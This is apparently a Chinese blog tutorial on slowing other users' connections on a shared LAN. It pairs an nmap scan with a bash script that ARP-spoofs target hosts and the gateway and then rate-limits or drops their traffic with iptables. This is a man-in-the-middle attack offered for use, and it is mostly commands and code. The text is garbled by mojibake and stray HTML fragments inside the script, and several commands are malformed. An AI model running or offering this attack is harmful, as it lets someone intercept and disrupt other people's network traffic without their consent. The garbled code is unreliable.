為了限制無(wú)線(xiàn)路由器上大家的上網(wǎng)速度����,減少p2p工具的影響
可以通過(guò)arp欺騙和iptables來(lái)限制局域網(wǎng)的上網(wǎng)速度
操作系統(tǒng):Ubuntu
1)sudo apt-get install dsniff nmap
2)探測(cè)局域網(wǎng)主機(jī)的ip地址
sudo nmap -ss 網(wǎng)關(guān)ip/24
在此例中:
192.168.1.100 為要限速的主機(jī)
192.168.1.1 為網(wǎng)關(guān)地址
3)打開(kāi) 內(nèi)核的 IP 轉(zhuǎn)發(fā)���,讓我們的主機(jī)成為路由器
echo 1 > /proc/sys/net/ipv4/ip_forward
4)使用 iptables和arpspoof進(jìn)行 限速! 腳本如下
使用方式:
sudo ./iptable.sh 要限的速度(30為40k/s) 網(wǎng)關(guān)ip 限速主機(jī)1 限速主機(jī)2
#!/bin/bash
if [ $# -le 2 ]
then
echo "Usage: ./iptables.sh speed gateway ip1 ip2 ...."
exit -1
else
speed=$1
gateway=$2
fi
IPT=/sbin/iptables/p>
p>while [ $# -gt 2 ]
do
shift
echo $gateway,$2
arpspoof -i eth0 -t $2 $gateway
arpspoof -i eth0 -t $gateway $2/p>
p> $IPT -A FORWARD -s $2 -m limit --limit ${speed}/s -j accept/p>
p> $IPT -A FORWARD -d $2 -m limit --limit ${speed}/s -j ACCEPT/p>
p> $IPT -A FORWARD -s $2 -j DROP/p>
p> $IPT -A FORWARD -d $2 -j DROP/p>
p>done
